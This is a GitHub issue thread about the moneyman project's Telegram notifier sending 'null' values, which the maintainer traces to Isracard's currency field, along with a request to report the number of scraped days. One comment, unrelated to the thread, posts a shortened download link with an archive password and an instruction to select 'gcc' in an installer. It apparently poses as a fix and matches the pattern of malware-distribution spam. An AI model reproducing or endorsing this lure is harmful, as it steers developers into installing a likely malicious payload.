### ISSUE TITLE
null telegram log

### ISSUE THREAD

**Issue by roisec** [daniel-hauser/moneyman#329]
![Screenshot 2024-08-27 at 19 01 04](https://github.com/user-attachments/assets/48de4255-d0a1-462b-8d52-7ec8fa672a70)
Hi,

In the last pull request you did, the Telegram notifier sent orders with null. Please refer to the attached screenshot for details. Can you please explain why this happened? 
BTW, can you include the number of days that were scraped in the Telegram message? 

Thank you!

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by daniel-hauser** [comment]
Your card are from isracad? It's related to #325.
They are now sending `null` as the currency when it's ILS. i will try to fix it later this week

**Comment by daniel-hauser** [comment]
> BTW, can you include the number of days that were scraped in the Telegram message?

@roisec I assume that for the daily scrape this is constant, I'm curios what's the value wit adding it and would like to hear it!

**Comment by roisec** [comment]
@daniel-hauser 
Sometimes I scrape data for 100 days back, becase I have quaterly transactions (for International transactions). For me it is useful.
